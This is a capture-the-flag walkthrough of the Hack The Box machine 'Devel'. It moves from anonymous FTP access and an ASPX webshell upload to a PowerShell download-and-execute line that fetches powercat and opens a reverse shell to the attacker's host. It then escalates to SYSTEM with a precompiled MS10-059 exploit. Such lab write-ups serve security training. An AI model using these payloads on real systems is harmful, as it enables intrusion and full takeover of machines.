hackthebox – devel – windows

Start the hack with nmap

# nmap 10.10.10.5 -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-08 01:05 EDT
Nmap scan report for 10.10.10.5
Host is up (0.16s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 310.01 seconds

Check if we have anonymous access or not.

# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> 

Nice, we have anonymous. Further, check if we can write there or not. I already have tested and it came positive.

HTTP shows the server has IIS installed.

We can upload the aspx webshell from FTP and try to access it from HTTP. Kali already has webshell.

# cp /usr/share/webshells/aspx/cmdasp.aspx ./

# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (9.0474 MB/s)
aspx webshell

We can now execute any windows command from here. Let’s get a shell using nc and powercat.

To get powercat, download it from github

# git clone https://github.com/besimorhino/powercat.git
Cloning into 'powercat'...
remote: Enumerating objects: 232, done.
remote: Total 232 (delta 0), reused 0 (delta 0), pack-reused 232
Receiving objects: 100% (232/232), 52.01 KiB | 72.00 KiB/s, done.
Resolving deltas: 100% (71/71), done.

# cd powercat/

Now start a web server in local so that we can upload it in devel.

# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Also, make sure you listen for the reverse shell.

# nc -lvnp 443

Now, enter the following command in HTTP

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://YOUR-IP/powercat.ps1');powercat -c YOUR-IP -p 443 -e cmd"

NOTE: CHANGE YOUR-IP to your local IP address

You should get a shell.

# nc -lvnp 443
listening on [any] 443 ...
connect to [YOUR-IP] from (UNKNOWN) [10.10.10.5] 49163
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

Nice, we got a low priv shell.

To root

For high-level priv, we can do manual enumeration or use windows exploit suggester. I used the latter one.

Download it from github.

# cd /opt
# git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester
# cd Windows-Exploit-Suggester
# pip install xlrd --upgrade
# ./windows-exploit-suggester.py --update

In low priv shell, run the following command to get the system details.

c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          10/6/2019, 7:53:53 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~1996 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.024 MB
Available Physical Memory: 694 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.482 MB
Virtual Memory: In Use:    566 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5

Nice! Save it as systeminfo.txt file

We can now use windows exploit suggester as below:

# ./windows-exploit-suggester.py --database 2019-06-09-mssb.xls --systeminfo systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

Great! We see few priv esac vulnerabilities. We can try a few. I will try some of [E], feel free to use [M].

At first, I tried MS11-011 which didn’t work for me. Therefore, I tried the next one, MS10-059.

You can get the pre-compiled binary from https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe or you can compile in your kali machine using mingw32. I used the pre-compiled one.

Download binary and upload using FTP. Make sure to set binary mode when uploading exe file.

# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put MS10-059.exe
local: MS10-059.exe remote: MS10-059.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
784384 bytes sent in 1.29 secs (592.8402 kB/s)

Before we execute it we need to listen to some port for the shell.

# nc -lvnp 4444

From previous low priv shell run it.

c:\inetpub\wwwroot>MS10-059.exe
MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
c:\inetpub\wwwroot>MS10-059.exe YOUR-IP 4444
MS10-059.exe YOUR-IP 4444

NOTE: CHANGE YOUR-IP to your local IP address

You will get a high priv shell.

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [YOUR-IP] from (UNKNOWN) [10.10.10.5] 49160
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\inetpub\wwwroot>whoami
whoami
nt authority\system

If you wish you can read the flags now:

c:\> type c:\Users\babis\Desktop\user.txt.txt
c:\> type c:\Users\Administrator\Desktop\root.txt.txt

Leave a Reply

Your email address will not be published. Required fields are marked *